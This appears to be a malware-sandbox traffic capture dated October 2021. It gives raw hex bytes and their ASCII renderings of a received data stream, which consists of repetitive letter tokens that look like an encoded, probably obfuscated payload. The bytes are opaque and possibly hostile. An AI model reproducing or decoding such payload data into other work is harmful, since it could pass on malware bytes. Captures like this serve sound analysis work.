                                                                                                                          2021-10-29 15:07:00 UTC1660INData Raw: 45 20 4f 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4b 20 52 20 4f 20 4b 6f 20 4b 6b 20 45 45 20 59 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4b 59 20 4f 20 4f 20 59 74 20 6b 74 20 51 78 20 52 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 78 20 6f 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 45 20 51 4f 20 52 78 20 59 78 20 45 52 20 45 4b 20 4f 6f 4b 20 6b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 51 45 20 4f 4f 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 78 20 45 20 4f 4f 4f 20 4f 4f 4b 20 4f 4f 6b 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 45 45 20 52 20 6b 52 20 4f 4f 4b 20 6b 6f 20 4f 78 51 20
                                                                                                                          Data Ascii: E Ot kK OOK Oot OOK R O Ko Kk EE YQ kY OOt OxQ Ooo KY O O Yt kt Qx Ro OxQ OOo YR Yx oR Kx kK OOK OOY OxE QO Rx Yx ER EK OoK kK OOt OxQ OOk QE OO Yx YK QK Oox OtO OOx kR oER Kk Yo ok kY Qk OOt OxQ OOo Yx YK Yx E OOO OOK OOk Qk OOo Yx KQ EE R kR OOK ko OxQ
                                                                                                                          2021-10-29 15:07:00 UTC1661INData Raw: 4f 4f 52 20 51 45 20 4f 78 4f 20 4f 4f 6f 20 59 78 20 6f 74 20 51 45 20 6f 4b 6b 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 6f 20 4f 52 4f 20 59 4f 20 4b 6b 20 59 6f 20 52 78 20 4f 45 6b 20 4f 4f 45 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 6f 45 52 20 59 4f 20 6f 78 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 45 20 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 74 20 4b 51 20 59 78 20 59 4b 20 74 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6b 45 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 4b 20 59 4f 20 59 4b 20 6b 4b 20 51 78 20 4f 4f 52 20 4f 78 51
                                                                                                                          Data Ascii: OOR QE OxO OOo Yx ot QE oKk kY OOK OOY o ORO YO Kk Yo Rx OEk OOE kE OtQ OOo oER YO ox oEo kK OOR QY OxQ OOo Yx OOE R YK kK OOK OOt OxQ OOo Yt KQ Yx YK tR OOK OOt OxQ kE YO Kk Yx YE kK OOK OOt Qk OOo Yx KQ Yx YK kK OOK OoO OxQ OOo Yx KK YO YK kK Qx OOR OxQ
                                                                                                                          2021-10-29 15:07:00 UTC1662INData Raw: 4b 20 59 78 20 4f 6f 52 20 4b 78 20 4f 4f 4b 20 51 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 6f 20 4f 4f 4b 20 6f 4b 51 20 6f 59 59 20 4f 4f 6f 20 4b 51 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 59 20 4f 4f 6f 20 4f 4f 4b 20 4b 51 20 59 78 20 59 4b 20 51 59 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 45 20 4f 6f 4f 20 4b 51 20 59 78 20 4b 6b 20 51 4b 20 4f 4f 6f 20 6f 52 20 59 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 78 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 6f 20 74 6f 20 4f 4b 59 20 4b 6b 20 59 78 20 59 4b 20 6b 45 20 6f 51 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 6f 4f 20 4f 78 4f 20 45 4f 20 4f 4f 78 20 4b 6b 20 59 78 20 52 78 20 45 6b
                                                                                                                          Data Ascii: K Yx OoR Kx OOK Qt OxQ OOo Yx Kk Yx YK ko OOK oKQ oYY OOo KQ Yk Yx YK kY OxY RQ OxY OOo OOK KQ Yx YK QY OOK OOt OoK E OoO KQ Yx Kk QK OOo oR Yo OOo Yx Yk QE OxQ kK OOK Oot Oxo to OKY Kk Yx YK kE oQ Ooo OxQ OOo YR Rk Et YK kK OOY OoO OxO EO OOx Kk Yx Rx Ek
                                                                                                                          2021-10-29 15:07:00 UTC1664INData Raw: 20 4f 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 45 59 20 52 74 20 4b 45 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 4f 4f 4f 20 4f 4b 20 4b 6b 20 4b 51 20 59 78 20 59 78 20 4f 4f 45 20 51 59 20 51 6b 20 74 59 20 4f 4b 20 59 4f 20 4b 51 20 59 78 20 59 78 20 4f 74 78 20 4f 4f 52 20 4f 59 4f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 52 74 20 4b 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 78 20 6f 45 74 20 4f 4f 4b 20 59 4f 20 4b 6b 20 59 4b 20 45 78 20 6b
                                                                                                                          Data Ascii: OOK OoO OxQ OOo EY Rt KE YK kK Oox Oot OOO OK Kk KQ Yx Yx OOE QY Qk tY OK YO KQ Yx Yx Otx OOR OYO Oxk OOo Yo Rt Kx YK kK Oox kx oEt OOK YO Kk YK Ex k
                                                                                                                          2021-10-29 15:07:00 UTC1664INData Raw: 59 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 45 4f 20 4b 52 20 4b 6b 20 59 78 20 52 78 20 51 59 20 74 4b 20 52 4b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 59 59 20 51 45 20 4b 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 4f 6f 78 20 4b 6f 20 45 51 20 45 74 20 4f 6b 74 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45 52 20 4b 74 20 4b 6f 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 6f 4b 4b 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 74 20 6f 6f 78 20 4f 4f 4b 20 59 78 20 52 4b 20 74 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 4f 4f 4f 20 59 78 20 4b 6b 20 59 52 20 4f 4b 6b 20 4f 6f 4b 20 4f 59 4b 20 4f 4f 74 20 4f 78 51
                                                                                                                          Data Ascii: Y OOK OOt tx EO KR Kk Yx Rx QY tK RK Oxk OOo Yx YY QE KE kK OOK Oot Qt Oox Ko EQ Et Okt Oo OOK OOt Oxk kY ER Kt Ko Okt OK OOK OOt Oxk kY ooR oKK Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox t oox OOK Yx RK tR Kx kK OOK Oot RQ OOO Yx Kk YR OKk OoK OYK OOt OxQ
                                                                                                                          2021-10-29 15:07:00 UTC1665INData Raw: 4f 4f 4b 20 59 78 20 4b 6b 20 59 78 20 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4b 6f 20 4f 4f 45 20 59 78 20 4b 6b 20 74 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 6b 20 59 78 20 59 4b 20 4b 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 6f 4b 4b 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 4f 20 52 20 6b 6f 20 4f 4f 4b 20 4f 52 59 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 52 4f 20 59 78 20 59 4b 20 52 51 20 4f 20 74 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 6b 20 4b 6b 20 4b 4f 20 51 78 20 6f 59 59 20 4b 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 6f 4f 20 6f 6f 52 20 4f
                                                                                                                          Data Ascii: OOK Yx Kk Yx t kK OOK OOt Ko OOE Yx Kk tK YY kK OOK Oot OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yo Kk Yx YK Ko OOY OOt OxQ oKK YO Kk Yx YE kK OOK OOt Qk OOo Yx KQ KO R ko OOK ORY Oxk OOo Yx RO Yx YK RQ O tK OxQ OOo YR Yk Kk KO Qx oYY Kt OxQ OOo YO oO ooR O
                                                                                                                          2021-10-29 15:07:00 UTC1667INData Raw: 4f 20 6f 6f 52 20 6f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 74 4f 20 59 78 20 4b 6b 20 59 52 20 52 51 20 4f 78 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 59 6b 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 74 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 6b 20 59 4f 20 59 4b 20 6b 6f 20 51 51 20 4f 4f 59 20 4f 78 4f 20 51 74 20 59 4b 20 4b 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 45 4b 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 6b 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 78 78 20 4f 78 74 20 51 51 20 59 59 20 6f 45 6b 20 4b 51 20 4f 52 20 4f 45 6b
                                                                                                                          Data Ascii: O ooR oxk kK OOK OOE RQ tO Yx Kk YR RQ Oxk OOK OOt OxE EO OYk Kk Yx Kk YQ tE OOt OxQ Ooo QE k YO YK ko QQ OOY OxO Qt YK KE OQO Oxk kK OOK OOR to ORx OEK Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ oOt OxQ OOo Yo QY k YY kK OOR Oxx Oxt QQ YY oEk KQ OR OEk
                                                                                                                          2021-10-29 15:07:00 UTC1668INData Raw: 45 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 45 78 20 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 6f 20 59 6f 20 59 59 20 45 74 20 4f 74 6f 20 51 4b 20 6b 51 20 4f 4f 45 20 4f 78 52 20 4f 78 6f 20 4f 52 6b 20 59 6b 20 6f 45 52 20 59 45 20 4f 4f 4b 20 4f 74 6f 20 4f 4f 74 20 4f 78 74 20 51 78 20 59 78 20 4b 51 20 45 4b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 4f 4f 6f 20 51 78 20 51 4b 20 59 78 20 59 45 20 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 78 74 20 6f 20 59 6f 20 59 78 20 6f 78 45 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 45 45 20 52 59 20 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 45 20 6f 20 4f 4b 45 20 59 78 20 59
                                                                                                                          Data Ascii: E OOo Yx Yo oR O kK OOK Oot Ex to Yx Kk YR Ex Q OOK OOt OxE Qo Yo YY Et Oto QK kQ OOE OxR Oxo ORk Yk oER YE OOK Oto OOt Oxt Qx Yx KQ EK YK kK OOK OOt Oxt OOo Qx QK Yx YE QK OOK OOt Oxk Oxt o Yo Yx oxE kY OOK OOt Qk OOo Yx EE RY x kK OOK Oot OxE o OKE Yx Y
                                                                                                                          2021-10-29 15:07:00 UTC1669INData Raw: 20 45 51 20 51 4b 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 51 6f 20 45 51 20 51 59 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 6b 74 20 45 78 20 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 74 20 59 52 20 6f 4b 20 4f 6f 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 45 45 20 59 6b 20 4f 6f 4b 20 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 45 59 20 59 51 20 6f 52 20 4f 6f 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 4f 74 20 59 78 20 4b 6b 20 59 52 20 45 51 20 6b 6b 20 4f 78 4f 20 51 74 20 52 51 20 6b 52 20 59 78 20 4b 6b 20 59 6f 20 45 74 20 6b 51 20 4f 78 4f 20 51 74 20 52 51 20 6b 52 20 59 78 20 4b 6b 20 59 6f 20 45 74 20 51 78 20 51 51 20 4f 6f 78 20 52 51 20 74 52 20 59
                                                                                                                          Data Ascii: EQ QK Qx tE OxQ OOo YR oQ Qo EQ QY Qx tE OxQ OOo YR oQ kt Ex Yo OOK OOt OxE Qt YR oK OoO YK kK Oox oR Oo OOo Yx Yk EE Yk OoK Ok OOt OxQ Ooo EY YQ oR OoY kK OOK Oot o Ot Yx Kk YR EQ kk OxO Qt RQ kR Yx Kk Yo Et kQ OxO Qt RQ kR Yx Kk Yo Et Qx QQ Oox RQ tR Y
                                                                                                                          2021-10-29 15:07:00 UTC1671INData Raw: 20 4f 4f 74 20 4f 4f 4f 20 6b 6b 20 45 51 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4b 59 20 4f 4f 45 20 4f 78 51 20 78 20 6f 52 20 6f 45 45 20 59 78 20 59 4b 20 6b 6f 20 51 78 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 6f 59 20 59 4f 20 59 4b 20 59 4f 20 51 78 20 4f 4f 6b 20 4f 6f 45 20 4f 78 4b 20 4f 6f 52 20 59 6f 20 52 6f 20 59 45 20 59 52 20 51 6f 20 4f 6f 4b 20 4f 6f 4b 20 51 51 20 4f 6f 6f 20 51 45 20 6f 78 4b 20 59 4f 20 59 4b 20 6b 6f 20 6b 6b 20 74 20 4f 4f 4f 20 6b 6b 20 45 51 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 51 20 4f 4f 45 20 4f 78 51 20 78 20 6f 52 20 6f 45 45 20 59 78 20 59 4b 20 6b 6f 20 51 78 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 6f 59 20 59 4f 20 51 45 20 6f 78 52 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 4f 20 6f 6f 52 20 4b 6b 20 6f 4b 20
                                                                                                                          Data Ascii: OOt OOO kk EQ Kk Yx Kk Ek KY OOE OxQ x oR oEE Yx YK ko Qx OoR OxQ OOo oY YO YK YO Qx OOk OoE OxK OoR Yo Ro YE YR Qo OoK OoK QQ Ooo QE oxK YO YK ko kk t OOO kk EQ Kk Yx Kk Ek Q OOE OxQ x oR oEE Yx YK ko Qx OoO OxQ OOo oY YO QE oxR kY OOK OOY tO ooR Kk oK
                                                                                                                          2021-10-29 15:07:00 UTC1672INData Raw: 51 20 4f 4f 6f 20 59 6f 20 59 4f 20 59 6f 20 45 4b 20 51 45 20 4f 6f 6f 20 6f 52 20 74 74 20 4f 4f 6f 20 59 78 20 59 4b 20 45 45 20 59 78 20 4f 45 6b 20 4f 4f 51 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 45 6b 20 6f 52 20 45 59 20 59 78 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 74 4b 20 4f 4f 4b 20 4f 74 20 6f 45 51 20 4f 4f 6f 20 4b 51 20 52 45 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 6f 20 4f 4f 6f 20 6f 4b 4b 20 4b 6b 20 59 78 20 59 4b 20 74 78 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 4b 20 52 4b 20 4b 74 20 59 59 20 59 4b 20 45 52 20 78 20 6b 6f 20 4f 78 4b 20 4f 4f 6f 20 52 52 20 52 52 20 6b 45 20 59 4f 20 6b 4b 20 6f 20 51 45 20 74 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 52 20 59 6f
                                                                                                                          Data Ascii: Q OOo Yo YO Yo EK QE Ooo oR tt OOo Yx YK EE Yx OEk OOQ kE OtQ OOo Ek oR EY Yx OoR OOK OOt Oxk QR Yx Kk Yx YK tK OOK Ot oEQ OOo KQ RE Yx YK kY OxY RQ Oxo OOo oKK Kk Yx YK tx OOK OOt OoK OOK RK Kt YY YK ER x ko OxK OOo RR RR kE YO kK o QE tQ OOo Yx YK YR Yo
                                                                                                                          2021-10-29 15:07:00 UTC1673INData Raw: 4f 20 52 52 20 4f 6f 74 20 4f 78 51 20 6f 4b 4f 20 59 78 20 4b 6b 20 59 78 20 45 59 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 4f 4f 59 20 52 4b 20 4f 45 59 20 59 59 20 59 4b 20 45 52 20 51 78 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 45 6b 20 6f 52 20 52 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 45 20 4f 4f 6b 20 6f 52 20 74 78 20 59 78 20 59 4b 20 51 4b 20 4f 6f 4f 20 4f 4f 51 20 4f 4f 51 20 6f 59 45 20 45 74 20 4b 6b 20 59 78 20 4b 59 20 4f 4f 45 20 4f 78 78 20 6b 59 20 45 6b 20 59 6f 20 4f 4f 6f 20 4f 6f 59 20 6f 52 20 52 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 78 74 20 6b 59 20 45 74 20 45 51 20 6f 52 20 52 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 78 74 20 6b 59 20 4b 6f 20 59 6f 20 4f 6b 6b 20 51 59 20 4f 6f 4b 20 59 20 4f 4f 74 20 4f
                                                                                                                          Data Ascii: O RR Oot OxQ oKO Yx Kk Yx EY kK OOK Oxx OOO OOY RK OEY YY YK ER Qx kO OxQ OOo Yo Ek oR RQ kK OOK Oot OxE OOk oR tx Yx YK QK OoO OOQ OOQ oYE Et Kk Yx KY OOE Oxx kY Ek Yo OOo OoY oR RY kK OOK Oot oxt kY Et EQ oR RY kK OOK Oot oxt kY Ko Yo Okk QY OoK Y OOt O
                                                                                                                          2021-10-29 15:07:00 UTC1675INData Raw: 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 6b 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 45 20 6f 20 59 45 20 6b 4b 20 4f 4f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 45 45 20 4b 6b 20 59 78 20 45 51 20 6b 52 20 51 4b 20 4f 4f 45 20 4f 4f 4f 20 6f 59 4b 20 45 4f 20 59 6f 20 45 6b 20 52 78 20 4f 45 6b 20 51 6b 20 4f 4f 51 20 4f 78 59 20 4f 4f 59 20 6f 52 20 74 4b 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 74 4f 20 4f 78 4b 20 6b 52 20 45 6b 20 59 6b 20 6f 45 52 20 59 4b 20 6b 6f 20 6b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 78 6f 20 45 52 20 4b 6b 20 59 59 20 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 6f 52 20 52 4b 20 4b 51 20 4b 6b 20
                                                                                                                          Data Ascii: K OOo Yx YK QE kt kK OOK Oot tO OOo Yx KE o YE kK OOO OOt OxQ OOo EE Kk Yx EQ kR QK OOE OOO oYK EO Yo Ek Rx OEk Qk OOQ OxY OOY oR tK Yx YK QK Oox OtO OxK kR Ek Yk oER YK ko kk OOt OxQ OOo YO Eo Yx YK kK OOK OOt OxQ Oxo ER Kk YY Yt kK OOK OOR OoR RK KQ Kk
                                                                                                                          2021-10-29 15:07:00 UTC1676INData Raw: 6f 20 6f 4b 20 6f 20 4b 6b 20 45 78 20 45 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 45 78 20 4b 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 52 4b 20 51 45 20 4f 45 20 4f 4f 6f 20 59 78 20 59 6b 20 4b 6b 20 6b 51 20 59 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 78 20 59 78 20 4b 6b 20 4b 4f 20 52 20 6b 52 20 4f 4f 4b 20 51 4b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 78 20 59 4b 20 52 51 20 4f 4f 6f 20 51 45 20 6b 4f 20 4f 4f 6f 20 59 78 20 59 6b 20 45 78 20 52 6f 20 4b 6f 20 4f 78 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 59 52 20 6f 45 6b 20 4b 45 20 59 6f 20 4f 6f 4b 20 6b 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 4b 51 20 6f 4b 20 6f 4b 20 59 4b 20 6b 4b 20 4f 4f 52 20 51 45 20 74 78 20 4f 4f 6f 20 59 78 20 59 4b 20 59 52 20 6f 45 6f 20 6b 4f
                                                                                                                          Data Ascii: o oK o Kk Ex EO OOK OOt OxE kk Ex Kk Yx Kk OoR RK QE OE OOo Yx Yk Kk kQ YE OOK OOt OxE Qx Yx Kk KO R kR OOK QK OxQ OOo Yx YK Yx YK RQ OOo QE kO OOo Yx Yk Ex Ro Ko Oxk OOt OxQ Ooo YR oEk KE Yo OoK kQ OOt OxQ OOk KQ oK oK YK kK OOR QE tx OOo Yx YK YR oEo kO
                                                                                                                          2021-10-29 15:07:00 UTC1677INData Raw: 20 4f 4f 6f 20 6f 78 20 4b 6b 20 59 78 20 59 4b 20 74 51 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 59 20 52 59 20 51 4f 20 59 4f 20 59 4b 20 6b 6f 20 45 59 20 4f 4f 6b 20 4f 4f 4f 20 4f 4f 20 4b 6b 20 4b 6b 20 59 78 20 59 78 20 59 51 20 4f 4f 45 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 51 51 20 45 51 20 59 52 20 6f 45 6f 20 6b 6b 20 6b 4b 20 4f 4f 6b 20 45 78 20 6f 74 20 59 4f 20 4b 6b 20 59 6f 20 4f 78 45 20 52 52 20 4f 6f 78 20 4f 74 4f 20 4f 78 51 20 4f 4f 6b 20 6f 4b 20 4b 6b 20 59 78 20 59 59 20 52 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4b 6f 20 4b 52 20 6b 4b 20 4f 6f 52 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 45 20 6f 20 59 6f 20 6b 4b 20 4f 78 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4b 52 20 4b 6b 20
                                                                                                                          Data Ascii: OOo ox Kk Yx YK tQ OOK OOt OoK OOY RY QO YO YK ko EY OOk OOO OO Kk Kk Yx Yx YQ OOE OOR OxQ OOk QQ EQ YR oEo kk kK OOk Ex ot YO Kk Yo OxE RR Oox OtO OxQ OOk oK Kk Yx YY Rk OOK OOt OxQ OOo Yx Kk Ko KR kK OoR Ooo OxQ OOo YO KE o Yo kK Oxx OOt OxQ OOo KR Kk
                                                                                                                          2021-10-29 15:07:00 UTC1679INData Raw: 6f 20 74 59 20 4f 78 6f 20 59 52 20 6f 45 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 6f 20 51 6b 20 4f 4f 6f 20 59 59 20 52 45 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 4f 4f 20 4f 4f 6f 20 45 52 20 4b 6b 20 59 78 20 59 4b 20 74 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 4b 20 74 45 20 59 78 20 59 78 20 59 4b 20 6b 78 20 4f 4f 45 20 6f 52 20 4f 78 6f 20 4f 4f 45 20 59 78 20 59 4b 20 59 52 20 6f 45 6f 20 6b 4f 20 6b 4b 20 51 51 20 4f 78 45 20 4f 74 4b 20 59 78 20 59 4b 20 6f 4b 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 51 4f 20 4f 6f 59 20 4f 4f 74 20 4f 78 4b 20 4f 6f 74 20 59
                                                                                                                          Data Ascii: o tY Oxo YR oEk Yx Kk OoR OOK OOt Oxk QR Yx Kk Yx YK kK OOK Ooo Qk OOo YY RE Yx YK kY OxY RQ OOO OOo ER Kk Yx YK to OOK OOt OoK OOK tE Yx Yx YK kx OOE oR Oxo OOE Yx YK YR oEo kO kK QQ OxE OtK Yx YK oK YK kK OOY OxO OxQ OOo Yx Kk Yx YK QO OoY OOt OxK Oot Y
                                                                                                                          2021-10-29 15:07:00 UTC1680INData Raw: 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 4b 51 20 51 59 20 45 6b 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 6f 74 20 4f 74 51 20 4f 4f 74 20 6f 78 20 45 6b 20 59 52 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 74 20 52 4f 20 4b 6b 20 59 59 20 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 6b 20 52 4b 20 4b 6b 20 4b 6b 20 45 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 59 20 4f 78 51 20 4f 4f 6f 20 45 59 20 59 78 20 74 45 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 4f 4f 78 20 45 4f 20 52 4f 20 4b 51 20 59 78 20 4b 6b 20 51 4b 20 4f 74 6f 20 4f 4f 6f 20 74 59 20 4f 78 6f 20 59 52 20 6f 45 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f
                                                                                                                          Data Ascii: Oo OOt OxQ OOR KQ QY Ek YY kK OOR Oot OtQ OOt ox Ek YR oEo kK OOR QY OxQ OOo YO Eo Yx YK kK OOK OOt OxQ Oot RO Kk YY Yt kK OOK OOR OOk RK Kk Kk ER YK kK OOK OxY OxQ OOo EY Yx tE Yo kK OOK OOE OOx EO RO KQ Yx Kk QK Oto OOo tY Oxo YR oEk Yx Kk OoR OOK OOt O
                                                                                                                          2021-10-29 15:07:00 UTC1681INData Raw: 4f 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45 4f 20 59 4f 20 6f 78 20 6f 51 20 6b 4f 20 6f 51 20 6f 45 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 78 20 74 45 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 6f 4b 20 6f 4b 45 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 6f 4f 20 4f 4f 45 20 6b 45 20 74 78 20 4f 4f 74 20 51 45 20 4f 52 51 20 59 78 20 59 4b 20 51 4b 20 4f 4f 6f 20 4f 4b 20 4f 4f 78 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 45 20 6f 74 20 6b 52 20 6b 4b 20 51 59 20 52 51 20 6f 45 4b 20 59 78 20 4b 6b 20 59 52 20 6f 6b 20 74 6b 20 51 78 20 52 6f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 6f 52 20 59 78 20 4b 59 20 4f 78 78 20 4f 4f 51 20 4f 4f 74 20 4f 74 52 20 4f 4f 45 20 59 78 20 4b 6b 20 4b 74 20 59 4b 20 6b 4b 20 51 51 20 4f 